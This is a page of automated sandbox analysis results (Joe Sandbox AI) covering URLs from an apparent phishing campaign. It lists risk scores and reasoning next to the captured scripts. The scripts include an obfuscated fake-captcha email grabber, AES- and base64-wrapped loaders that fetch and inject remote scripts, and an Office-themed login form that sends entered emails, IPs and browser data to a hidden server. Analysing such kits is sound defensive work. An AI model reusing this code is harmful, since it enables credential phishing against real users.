| URL: http://sammobile.digidip.net Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": true,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: http://sammobile.digidip.net |
| URL: https://massageclinic.com.au/wadblacks2/captcha.js... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. While some of the behaviors may be related to legitimate functionality like analytics or error reporting, the overall level of obfuscation and suspicious activity raises significant concerns. Further investigation is warranted to determine the true intent and nature of this script."
} |
const _0x50eb76=_0xa93f;(function(_0x5318f6,_0x37e9e8){const _0x55eaef=_0xa93f,_0x1d981e=_0x5318f6();while(!![]){try{const _0x34adaf=-parseInt(_0x55eaef(0x198))/0x1+parseInt(_0x55eaef(0x176))/0x2*(-parseInt(_0x55eaef(0x173))/0x3)+-parseInt(_0x55eaef(0x174))/0x4*(parseInt(_0x55eaef(0x161))/0x5)+parseInt(_0x55eaef(0x14d))/0x6*(-parseInt(_0x55eaef(0x179))/0x7)+parseInt(_0x55eaef(0x155))/0x8+-parseInt(_0x55eaef(0x165))/0x9+parseInt(_0x55eaef(0x180))/0xa;if(_0x34adaf===_0x37e9e8)break;else _0x1d981e['push'](_0x1d981e['shift']());}catch(_0x1c9068){_0x1d981e['push'](_0x1d981e['shift']());}}}(_0x1bc3,0x7ebea));let extractedEmail='',mouseMovements=[],mouseDownDuration=null;function _0xa93f(_0x25bd85,_0x10afe9){const _0x1bc318=_0x1bc3();return _0xa93f=function(_0xa93fe4,_0x209a26){_0xa93fe4=_0xa93fe4-0x14d;let _0xaeccec=_0x1bc318[_0xa93fe4];return _0xaeccec;},_0xa93f(_0x25bd85,_0x10afe9);}const startTime=Date['now']();let failedAttempts=0x0;function extractEmail(){const _0x1e2735=_0xa93f,_0xbed409=decodeURIComponent(window[_0x1e2735(0x18d)]['href']),_0xd5a59c=window[_0x1e2735(0x18d)][_0x1e2735(0x172)][_0x1e2735(0x187)](0x1),_0x2dcec5=_0xd5a59c||_0xbed409[_0x1e2735(0x192)](/([^\/]+)$/)?.[0x1];if(_0x2dcec5)try{const _0x2e9731=atob(_0x2dcec5);_0x2e9731&&_0x2e9731[_0x1e2735(0x16f)]('@')&&(extractedEmail=_0x2e9731);}catch(_0x5c37ef){console[_0x1e2735(0x16a)](_0x1e2735(0x156),_0x5c37ef);}}function _0x1bc3(){const _0x390f0d=['2858253nsBRNx','2757964DLsqKS','toString','2qxzqjs','message','createElement','2727277SoJrWp','target-image','Failed\x20to\x20load\x20target\x20image:','getElementById','permanently_blocked','server.php','push','24513270OFjeDv','captcha-option','slice','Error\x20loading\x20images:','You\x20can\x20now\x20retry.','textContent','get_images.php','substring','abs','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20style=\x22padding:\x2020px;\x20text-align:\x20center;\x20position:\x20absolute;\x20top:\x2050%;\x20left:\x2050%;\x20transform:\x20translate(-50%,\x20-50%);\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<h1\x20style=\x22color:\x20red;\x22>Restricted</h1>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<p>','sort','clientX','redirect','location','add','\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20','Retry\x20in\x20','<p\x20id=\x22block-timer\x22></p>','match','clientY','image-options','touchstart','POST','block-timer','411662xxnBIK','filter.php','\x20seconds.','6JPeuci','appendChild','click','src','redirect_url','json','floor','innerHTML','4095360MKmcPm','Error\x20decoding\x20email:','random','No\x20images\x20found','block','img','Error\x20handling\x20image\x20click:','href','body','mousemove','addEventListener','blocked','5AWlBuM','style','display','onload','5274PTpXDs','innerWidth','application/json','forEach','reason','error','now','stringify','You\x20are\x20temporarily\x20blocked.','length','includes','classList','substr','hash'];_0x1bc3=function(){return _0x390f0d;};return _0x1bc3();}extractEmail(),window[_0x50eb76(0x15f)]('hashchange',extractEmail),document[_0x50eb76(0x15f)]('DOMContentLoaded',async()=>{const _0x1d7deb=_0x50eb76,_0xb28b0=document[_0x1d7deb(0x17c)](_0x1d7deb(0x194)),_0x318782=document[_0x1d7deb(0x17c)](_0x1d7deb(0x17a));let _0x793576='default-'+Math['random']()[_0x1d7deb(0x175)](0x24)[_0x1d7deb(0x171)](0x2,0x9);window[_0x1d7deb(0x166)]>0x300&&document[_0x1d7deb(0x15f)](_0x1d7deb(0x15e),_0x12bcb7=>{const _0x440973=_0x1d7deb;mouseMovements[_0x440973(0x17f)]({'x':_0x12bcb7[_0x440973(0x18b)],'y':_0x12bcb7[_0x440973(0x193)],'timestamp':Date['now']()}),mouseMovements[_0x440973(0x16e)]>0x64&&mouseMovements['shift']();});document[_0x1d7deb(0x15f)]('mousedown',()=>{const _0x249a07=_0x1d7deb;!mouseDownDuration&&(mouseDownDuration=Date[_0x249a07(0x16b)]()-startTime);}),document[_0x1d7deb(0x15f)](_0x1d7deb(0x195),()=>{const _0x5d6b4f=_0x1d7deb;!mouseDownDuration&&(mouseDownDuration=Date[_0x5d6b4f(0x16b)]()-star |
| URL: https://massageclinic.com.au/wadblacks2/ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://massageclinic.com.au Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://massageclinic.com.au |
| URL: https://massageclinic.com.au/wadblacks2/ Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazo... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and interaction with suspicious domains. While the script appears to have a legitimate purpose (potentially related to Microsoft Office support), the use of obfuscated code and the lack of transparency around the data being sent raise significant security concerns."
} |
let usuuid = "tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==";
let policy = "Upuzk3V1WMMG4sMCmrth+iwGUJ+xnI5+MAOnWPam1IZQGLRkwfAq5W/RwyNrdwxqijCn2bg9OIBIfdBEOuDvdw==";
let SV = "0";
let SIR = "0";
function decstr(encryptedString, key) {
const keySize = [16, 24, 32];
if (!keySize.includes(key.length)) {
throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
}
const encryptedData = CryptoJS.enc.Base64.parse(encryptedString);
const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4));
const ciphertext = CryptoJS.lib.WordArray.create(
encryptedData.words.slice(4)
);
const decryptedData = CryptoJS.AES.decrypt(
{
ciphertext: ciphertext,
},
CryptoJS.enc.Utf8.parse(key),
{
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
}
);
return decryptedData.toString(CryptoJS.enc.Utf8);
}
async function GEInfo() {
try {
const response = await fetch(decstr(policy, "708b91a2n3k4a5i6"), {
method: "POST",
body: JSON.stringify({
psk: usuuid,
do: "GURI",
redirect_url: "https://support.microsoft.com/en-us/office/-something-went-wrong-error-when-you-try-to-start-an-office-app-4b4471dd-cf86-4a37-910d-35a01a6c7d17",
theme: "office",
}),
headers: {
"Content-Type": "application/json",
},
});
const data = await response.json();
if (data.c === "success") {
document.write(decstr(data.b, data.a));
} else {
document.write(`<p>${data}</p>`);
}
} catch (error) {
console.error("Error:", error);
document.write("An error occurred while making the request.");
}
}
(async () => {
await GEInfo();
})();
|
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazo... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The use of base64 encoding to obfuscate the script's contents further increases the risk. Overall, this script exhibits a high level of malicious intent and should be treated as a significant security threat."
} |
new Function(atob(`bm1uYW1IdmYgPSBbJ2h0JywgJ3RwczovJywgJy9kZWwnLCAnZW8nLCAnbmEnLCAnY2Nlc3MnLCAnZmxvJywgJ29yJywgJ3MuY29tLycsICdjMi00JywgJy00OGMnLCAnbTMtNCcsICc2MmMtMzcnLCAnNGNtJywgJy0yJywgJzc0MicsICdtLTInLCAnNGxhL21hJywgJ2ZpbG9zJywgJy9hdCcsICd0YScsICdjaC8nLCAnanMnLCAnL1pnbicsICd5a3YzJywgJzEyJywgJ2xlbXY4JywgJ1FOJywgJ3RoTFMnLCAndWcnLCAnQWJDaWwnLCAnejAnLCAnd0RTaScsICdLOUknLCAnS1YnLCAnZW0yJywgJ3JTY1RzSycsICdIY2kuaicsICdzJ10uam9pbihgYCk7CmRvY3VtZW50LndyaXRlKCc8c2NyaXB0IHNyYz0iJytubW5hbUh2ZisnIj48LycgKyAnc2NyaXB0PicpOw==`))();
|
| URL: https://deleonaccessfloors.com/c2-4-48cm3-462c-374... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a decryption function that uses the CryptoJS library to decrypt an encrypted string. The function takes an encrypted string and a key as input, and performs AES decryption using the provided key. This behavior is consistent with legitimate cryptographic operations and does not exhibit any high-risk indicators. The use of CryptoJS is a common practice for client-side encryption/decryption, and the function does not appear to be engaging in any suspicious activities like data exfiltration or dynamic code execution. Therefore, the risk score is assessed as low."
} |
function decstr(encryptedString, key) {
const encryptedData = CryptoJS.enc.Base64.parse(encryptedString);
const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4));
const ciphertext = CryptoJS.lib.WordArray.create(
encryptedData.words.slice(4)
);
const hashedKey = CryptoJS.SHA256(key);
const aesKey = CryptoJS.lib.WordArray.create(hashedKey.words.slice(0, 8));
const decrypted = CryptoJS.AES.decrypt({ ciphertext: ciphertext }, aesKey, {
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7,
});
return decrypted.toString(CryptoJS.enc.Utf8);
}
let ballerina = decstr(atob("V0pxVUZKUTBqckRBMlp6cVE4ODNCSm55MWhpUXFQbWJzMEhnTDNSaVZBVFh2dHRKR2xJaTlidzFSejFnVHM0U1JrenRDM2xSVlZUV21wZXdWU2oxQ25pU0QrNkZRZHRIeW9DUnJuam52VFpTdTY0N1dLeFVqTm5IRUNObjNLcCttNU83bkJZODBVZlYxbG5pcE5naFFkUk9DLzBnWjRYMWJXamhqZUI5MFZiRG1kcGhpNjdYWitzdjdPQkRRNlYveGE5TGUrUEVLeURwc3FKdkJtUlN5Lzg0VXc4dnl0MXVVYlFWcG5xZXF0am1nTVVmL1RGTGdSM2JKQjZaN2krTGpwMWxWSjRHVHUwMzJBaThmWkl3Mit1R3FIY1lMeXRGWjhqK2NFRnp4RDQyVWVKT0krbkYvNWtsZjZnNmFGQjhaNTVBQXd4UlQ3UHBmNTFwUytVbkRmU0IrSUFDQXZEV25KSE94MXNTd1hQNlN6V2luTC9US3NkdE9NaHhXemhWdVEwYTFwUVZJdjl5ZjR4cmZKbkxuVFpxSUNXMER3Y0lqUkFYcWZtSW0wL254WHFadzVqalkwYkdqZDQrUGlVQlFLY0lLMG1iMGFENWVGRVBkaU5DS2RWeWtXZjk4cGovb2pyeFQ1NHZnVTM1RmhmRytDdWp2WXJUVnY3ZGxnNFdZZVFBcFlpZjdCWkxZNkJyZzlMSlArOWFxNHFzb1hCaEd3bEdiU21CUWZvRTRucEp5QU1MNmZibkhXRkRUVDRvaTVqYVdqaStzOFcxZzlVZVZJeGRGcVZBa1dEUjJQZkcycWhEWnA4dTZrN3pkMGxSLzZpTE5vK0lydU5PTDFQOSszTjJXWDBseGl2VUNmVWVxd21hT0lEMnlSZjFDTVFwTlRkclByWXB4NWwwVVlxbllZNndrQkJmSVE3RFpqM1dsV3RCQmNoYllKMEwwOHpZVmtUSDBlSmFBVFY2b1NnVGwyWm5QemE2VzlTQlJEZmc4UWx6Y04yOGhueXRRWTJsVmlxSU1hQjJvdEhkTlpLZytKRFVLTG1Wb0xqNkt4Y1hLRW5sRlhsb05TY3JwMTZESklQa3NwRlV2MkdJRXlWWThEMVByVXNESzFBQXNqdWFsUEVVYnU2MTZ5VENzNDRINWJ1YjM3MzZ2eXp5Rmtxc1RKc0ZURTEvUzBFc2VWNjVpa0lzZU1sTVBkMzhGUElNL3JkUWo5K0VKNEVOUnZ3VHNvc2l3ajdTWGJnc1dsajBCYTJHemxGNnlyM1Zjb0hkbGYxNDAzR01zWmErQ0xvRjU0S0Fadjc4cjc2RmJkMlhNaER5Z1phTUp6OG5FUDJTL2JRdTBOLzdBOGs4VlVFT3k3aEtTTE16R0R6ZHhoYmFqSlM4QmJzbFBWMTVCWFlEcTN4OE9nMWVpbXNJdWNGWHZicXlNVUtZaWNFTW5QUkhoM2kraFpCcHFDdUdyeE83RXEzRHNsNEZwcFd2ZmtGYUZQeEJ3NGJhci8xKy9HU2laaklxTDF6ZmphSTAzODRZdCs0dG9ObUF4V0pvendoUFV3cG1uQjZ5L0l0YVlVV1h4R2FzOFJKSWpTWTFMQjYzYlFYRmp3UVJaK0prZ1NzOThrN2VhR1I0MzhiZFZ3QmtuKzB5dU0zWC9mamFMSUROY0owWEZGY3JCRzlObWNYb2IwYVIrZU5IQ1Z3NmN1NjVqUTlld2JOckxkaVdjdFc1UTFsNjRDRnVVdGlPVnhKampSZkJ3T1F6bWl0Si9wTEUzN2N0czBiMDFEZUwyL3ViY01Kd05iUG92Z0tuOEJPTTEwUS91a1FUZk5JYXQ5SHZ4ek9TM1ZBK2p3dFJUMGVJdXVOeWpYNFAyYWhmdjN5Q0I3UmFVU2dNU1JjWTVzNkJxMDNEdkJkMHZuK3l3MEZVRC9CeWRSQzNBSnFMNXRuck1UZnROQUl1cjZDYmd0M2dyV1Z5Y1hFdnZYVllTYnoxNlB5MHAzTHpocXpYOFdybUNNQUl5a3hOTWxBVTJ0SGdQdjRoRDRIL3kxTkdVSU1Ta1g3U1NaOFRvNmRZcSsraTRqVWhYK2pqL2lYbTlhZWtIZnhubFVDbnNvc2Y5a283eUVzV2FFZGdCM0orOUlud0lQdExGbFozVnRvZ2JOZ053LzhEVEVKWVd0WkdUVXN4ZVFKM0tWODNwdjJaQjBkcEpBNk56a2VwcEp4bjNUQlY4dGd3dWRBNTZBUG5lZEVXcllxbE9hQlMwTm1tM0N5RW93ZmZ5cnlsMlRHQjhQYnYxY1k3NnZiQlNxVkZJNWZMZ3RzUzdQSytKeFlQMDhPVWhvNm9MYU0xODhSYWhCZHVmeDBxeVFsbm00bmNvZU52RDZXNzlQN2thSkFqK2VHNGduYjBiMzZIZjNMdEZBcTVPdldXY1RqTTN4eDE0MXdpNHdSaUZUQmVlc013MTA2c0Rlbmp3c0hhWHJvL0cwb3NiQlJUYS9Vb2RvS1lvRi9XS2tVaTYvdytvUHArU0dxWkNmZ054NU1Nb0RUZGJocTVYTExiNVpCU1k1ZGp1S1NhbXZDSHV4STNwZnYwanhvWENTSDJXZi9JbE9KbFBzSlhMU0dhY200NjcvV0E1RjBrQVcxSDExRzRrdHg2NTd5WDFCS2NpUjhtano4T21uYmJhTjFRWE5xK1JJdGtyZWFjejB6WnpzK3JteFJxa3BqUVBlM05nV3MrY0s2WXR4R2JYVWFNV3dQa05LMVRPdmlmQ0UwbFZsMUI1eVN4T3dyOUNCYUNqcjUvY3hNRjJiUHJ3aFJaZnlOQ0R3eHNYUFJLSFBZSnQ2c09WUExxMElUcU9zdVRJY1l1eFNqbnEwclI3azdRanM3UWRmaGtCVWx2Z21ERkNpRkZHVmVXR001aHpkOVhqelZyZEI5YUpma2h2NExTVjJUdUJGaTJhb3h5ODRMbmJreG5ZRG5yQ0xia05aNGFDbWwvMGo2ekN3KzZRa2hSL2xDNW5xSCtRWHFJWWtWK01QUnRrMm1vWkN6SzhnaU1kcFoxbUp6L29oejZRMHN5clZDK2xYS3hTVnpYWFZralJoQ0Z2Z3NXNkN3bWJkOG9hNWdUNWtYOXlZYVd3eHloQ2FpQXlUVGJSWW9oRHZ3QnVCWmtCajg2VWQxbzhrSTdoZHcreGt3RFhEc0wzK3Y0K29zK2d0WnliZXZjRDJmTE1xTFE0MDBhMk05TjBLRnUvMGZJYVM1K2UxMEJlWUZwbklmaUNLYzJONngxSDlEenFsQXJGQVhVQjNvQTNpcHdrSm54OGpMdlpRMjRQMlk3MHduK2F6Tk5mSGczQ0RzT |
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code primarily focuses on cryptographic operations and utility functions, which are common in legitimate applications. While it uses some legacy practices like the `XDomainRequest` API, these pose only minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of common cryptographic functionality."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null,e};function n(){}var e={},o=e.lib={},s=o.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},f=o.WordArray=s.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||a).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(i());return new f.init(e,t)}}),c=e.enc={},a=c.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new f.init(r,e/2)}},h=c.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new f.init(r,e)}},d=c.Utf8={stringify:function(t){try{return decodeURIComponent(escape(h.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return h.parse(unescape(encodeURIComponent(t)))}},u=o.BufferedBlockAlgorithm=s.extend({reset:function(){this._data=new f.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=d.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProcessBlock(i,h);e=i.splice(0,c),r.sigBytes-=a}return new f.init(e,a)},clone:function(){var t=s.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),p=(o.Hasher=u.extend({cfg:s.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){u.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,e){return new p.HMA |
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com |
| URL: https://empressachkaortshe.s3.ap-northeast-2.amazo... Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it includes some potentially legitimate functionality, such as IP address retrieval and encryption, there are also indicators of moderate risk, including external data transmission and the use of obfuscated code. The overall behavior is not clearly malicious, but the script's intent and the nature of the transmitted data are not fully transparent. Additional context or analysis would be needed to determine the true purpose and risk level of this script."
} |
let current_ip = null;
function PhiJA(plainText, key) {
const keySize = [16, 24, 32];
if (!keySize.includes(key.length)) {
throw new Error("Incorrect AES key length. Use a 16, 24, or 32 bytes key.");
}
// Generate a random IV (initialization vector)
const iv = CryptoJS.lib.WordArray.random(16);
// Encrypt the plain text using AES with the given key and random IV
const encrypted = CryptoJS.AES.encrypt(CryptoJS.enc.Utf8.parse(plainText), CryptoJS.enc.Utf8.parse(key), {
iv: iv,
mode: CryptoJS.mode.CBC,
padding: CryptoJS.pad.Pkcs7
});
// Combine the IV and ciphertext (IV is necessary for decryption)
const encryptedData = iv.concat(encrypted.ciphertext);
// Convert the combined data to Base64 for easy transmission or storage
return CryptoJS.enc.Base64.stringify(encryptedData);
}
let psk = "tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==";
async function eO4f1dE() {
try {
const response = await fetch("https://api.ipify.org?format=json");
const json = await response.json();
return json.ip;
} catch (error) {
console.error(error);
return null;
}
}
(async function () {
current_ip = await eO4f1dE();
})();
$("#liAGwMXB").on("keypress", function (e) {
if (e.which == 13) {
value();
}
});
$("#gbwCG").on("click", function () {
value();
});
$("#vhxxVAU").on("keypress", function (e) {
if (e.which == 13) {
N5N5tgOvA();
}
});
$("#JiHpm6l").on("click", function () {
N5N5tgOvA();
});
$("#dwdgS, #YRxjDgOe").click(function (e) {
e.preventDefault();
if (window.location.hash)
history.replaceState(
null,
"",
window.location.href.replace(window.location.hash, "")
);
location.reload();
});
$("#liAGwMXB").prop("placeholder", atob("RW1haWwsIHBob25lLCBvciBTa3lwZQ=="));
$("#vhxxVAU").prop("placeholder", atob("UGFzc3dvcmQg"));
var d87sOS;
var TCWoiyr;
var Hbzfh;
var DhVSIaQl;
function gB() {
$("#v181sVyO").hide();
$("#y2MDXz").hide();
$("#qmBibhh").hide();
$("#InpUQGp").hide();
$("#AGS1Xc").hide();
$("#sUjPv").show();
if (d87sOS && d87sOS.readyState !== 4) {
d87sOS.abort();
}
if (TCWoiyr && TCWoiyr.readyState !== 4) {
TCWoiyr.abort();
}
if (Hbzfh && Hbzfh.readyState !== 4) {
Hbzfh.abort();
}
}
$("#Tb3s6i, #VhvRKrD4S").click(function (e) {
window.location.href = atob(
"aHR0cHM6Ly9zdXBwb3J0Lm1pY3Jvc29mdC5jb20vZW4tdXMvb2ZmaWNlLy1zb21ldGhpbmctd2VudC13cm9uZy1lcnJvci13aGVuLXlvdS10cnktdG8tc3RhcnQtYW4tb2ZmaWNlLWFwcC00YjQ0NzFkZC1jZjg2LTRhMzctOTEwZC0zNWEwMWE2YzdkMTc="
);
});
var qQYnHttS = atob($("#ohbop").val());
async function value() {
$("#bYGpvs").text("");
var cHEPiX9b = $("#liAGwMXB").val();
var fajEGCCfu =
'<span class="Wq3VBi">laden</span>E<span class="Wq3VBi">laden</span>nte<span class="Wq3VBi">laden</span>r <span class="Wq3VBi">laden</span>a v<span class="Wq3VBi">laden</span>ali<span class="Wq3VBi">laden</span>d e<span class="Wq3VBi">laden</span>mai<span class="Wq3VBi">laden</span>l ad<span class="Wq3VBi">laden</span>dres<span class="Wq3VBi">laden</span>s, p<span class="Wq3VBi">laden</span>hon<span class="Wq3VBi">laden</span>e nu<span class="Wq3VBi">laden</span>mbe<span class="Wq3VBi">laden</span>r<span class="Wq3VBi">laden</span> or<span class="Wq3VBi">laden</span> Sk<span class="Wq3VBi">laden</span>yp<span class="Wq3VBi">laden</span>e <span class="Wq3VBi">laden</span>na<span class="Wq3VBi">laden</span>m<span class="Wq3VBi">laden</span>e.';
if (!current_ip) {
current_ip = await eO4f1dE(); // Ensure the IP is fetched if not yet set
}
if (Ewvwmt($("#liAGwMXB").val())) {
$("#kfWDyp").css("display", "block");
$("#gbwCG").prop("disabled", true);
$.ajax({
url: qQYnHttS,
cache: false,
type: "POST",
data: JSON.stringify({
do: "check",
em: cHEPiX9b,
IP: current_ip,
bdata: navigator.userAgent,
psk: psk,
send_visit: SV,
send_invalid_result: SIR,
|
| URL: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on implementing various cryptographic primitives and utilities, which are common in legitimate applications. While the code uses some legacy practices like the `XDomainRequest` API, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a benign implementation of cryptographic functionality and poses a low risk."
} |
!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var 